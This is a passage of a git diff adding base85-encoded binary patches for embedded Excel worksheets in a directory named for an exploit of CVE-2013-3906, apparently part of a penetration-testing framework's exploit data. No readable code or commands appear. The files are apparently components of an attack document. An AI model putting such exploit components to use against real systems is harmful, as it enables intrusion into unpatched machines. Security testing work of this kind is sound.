zYB@g;yZ!8y?zs$=45e%SoA_rm^9dqhHmucLJYmL5#ZB!ZV(Atugb6gp9f)Wfdq!gA
zC%g|Q^%rb4MJBt%{OC8QZio`HgbK9dG~`;+zI;Dm{9f1TSa5vPfF3_Cpz<iePoDgx
zuKQKdg{vt<rLkc)Ki_^;;mNA^V3wY;G%;KKRM~uLqzYD|;yznVhVkXWqaaZ`>HKw{
z-Iul|3*nqNLLWZj@%yUjaA|KpBBL2Krra1ZkbC9%>ZZCt(tLWg6dTQIi(L7b{pRd}
z0LpoREI@%x{7r53WW#)YS-)&iii0Ey8f9QK_k>#l;`178jRpRx1Y);^elVe}8My(~
zEnN^ja;6wVr4d@hzQ1%)vefn4RdB9-ykn=ln56i-e5D&&T~*%5hCvbj^r=;OF32l?
zWDYcb9v^JgnHM3v5}sml!C2}~*swGU&XHV{)d}1Jo6qMrG*aO9lMUR-DurCZZVA-E
zex!`o>ggh|BJo5MED;{G46DmYlb-|;Xt+HNxQ}#_+{9H~)U+mBSc1Z|4={B|#F>`;
zRvd>(KMAYQ@qkjhVsK6U_IeKAg4Wru6+%F!-Dk$7q(R~e9!f_NtC<z;yY15Js3Ru3
z>!^z+d5%(S96FP{p`8o|AzaV2R}GyG`lS(q9#S~jjLzetrH`H{FgtZJX@)gchEF9r
z;|LHENIhF(>RHOzgbrtnR(bR0j6XalAL?l7&R8cb0e_Kt!oe2a-zC3>`z@nJS3=-%
zxpiG?T@&MghP5W+BPR~F3*Kg|=Cs^4`Dxr{cdg37{j?zoziE5yvYL~~YlO|<w;;r`
z_ElfrP&MW3s0~47%FCF8VXf*6yqev>?)PLiG%T{MpTClLPKw_X(y>!mYJa<wAOn`B
zjf~JF=Sz5#(2F)wr}kmhyDm-&;2QSGX77ykAKA!5Hx3|yMy>CW>yPu8lYt>LYO(%!
z{HV08V&=bVO@Rk7Zo$2$OxC=Zsnd$BT;|xzevydxA{wRomGDfhygbHjd<0y!R*WvI
znl;EGO!PKo_|qf=WPEbK>1r-X9X&2yr}x7BDxR8|vInChC3fu%QHCf*Fg?@m&q2z`
za8y+Hmm2M?F*7P~SqQ<DXjz$b$BiZG)aM$BUG*i-VPd0M(a?XEJmUr7jfhd3v>0oS
zkc@IhSK9J)#$c+a;A(D^n5~z9i<*HQt@?_6y{%zu2!RX5Sr41=FnX<SV=IAP^-fqy
zzx9c_1kWXqX^fFN@dc*>tNbkY#BMv+o`R>oh-zkGQqDyEyBZ_h=Q@l^pN$C;_iCOW
zDQ#n5H(9XXP-nh#%?S0LTD5&~1P$@O`*uJo2EI6SCC#D!jRlpYjBSmS9c=9!S&eKR
zKtCHF|0+>X9s=TH_2fF(ph63Li$tGCnn@SG9K^RjljNQv?T5fs8x+f%Xvsz|j|rEO
zsq<wchvDnBbh*%TvFR~74Z3OuESaaczJ{qNHOyl>7FZ+7tAgt3(^_J$BbP>-8a^;2
z_odVxTGaq|;Opt5;|Ee6jtzUn8ST!XQ#;Gp6;aq!Crk#vnKzV}&9nh3jXQ<Xxb+to
z*28z3P~_soRsqe0t>%Gz9m@W2YoxSDZHq53o;8Rd3V>GQ+sPF+okAa(I8KN8UoLg(
zTcy&PSF%X;Djh<;Y~_~_p-k<E0^cGJJDB*oTbD!(ZF)0L?iuhfA4;1gX{c@_87vY5
zuWrr;Jc<!*p1%o(jS{bDDz|?&J=?Kj;rmubwlX=-UO-o2{3>X5cDLE<rpJ@Gx+S_0
z^OkZUBE(cweJN~2#S2QW--)OHesw(@I)Voa?YsSzcm{TM|MKoT<9=T0u?kTWY?wg@
z(pS(>2A)8EpvM0qhs6wof}y4{J%ZD`)Y)o)lep%}o%Xf3>QaEx*Q4!kD@R3_jvHZQ
z91R2v?_MP2`sf?&wHIS6^^CZZOZpm%TYI7^zedTf|7g2d<Q0j;!Qbk~4D&3PMppab
zSnVjGj{PIM!q@LPJI#grX1IpiC92Cw;bPM&Jy}1?V_Fm)jN3}E^V@h_=uHUB`C?>6
zC3UuHdCB)ZvJBBHZV^bM>JAE3GDUgO2U2C92ku(BIF04U4yciq9#t3_%@agruhwLf
zwV_Hth?7)GGHZo2Lf?y?#`V-<bz%6kEve=5&ZdZlbN3b)hkJ?lUw90%&cI+Y^!XL@
z1<CDkxEvh2<J#FVlAzLJ+I*rUBYoLwJG5YYfq3LDBgi4&gfncgl(w()B|>RE?dEWy
zizUTw%zD?&%(37@{h^=I76CbGo8UMkSD>0!VyK1fv>g6h@5G=t+iVSOdUhuFE8ZY@
zx6E3da^8~Ik+TCwg}xo(onOKr5QZ6=bpE+-{GT2B&+{L;$jWkm2l#vQ>pzCypPo>+
z_)9D7uHoN134b*-gKAL!dtc!$&Ruo+7g9R3HGW5HzH59}8U1BUiu}X)H=Xn@!d=Di
z7s3;iKR^F}>4$d#@2YUW03}g>0N&N)?gHFB6a4}>#r`>`KTk+^P4AY;zf8&T?oQ@c
z(R>%>Zh7+y1q>A)p*!+hv2z#U?<xJ4JpgbCt=@l2@ORDs9+>}X?gW)K|1|$2Oe@R5
TLkR}}phAB*P|os@eSiBO+t8bX

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..47c4681188888bcac3abffa8a43a31544fdb49d6
GIT binary patch
literal 8544
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
R2LNEee)urV3IM;q{SSvclV<<`

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..30b4817db407fad3f23452fba755190fc08f1d25
GIT binary patch
literal 8543
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
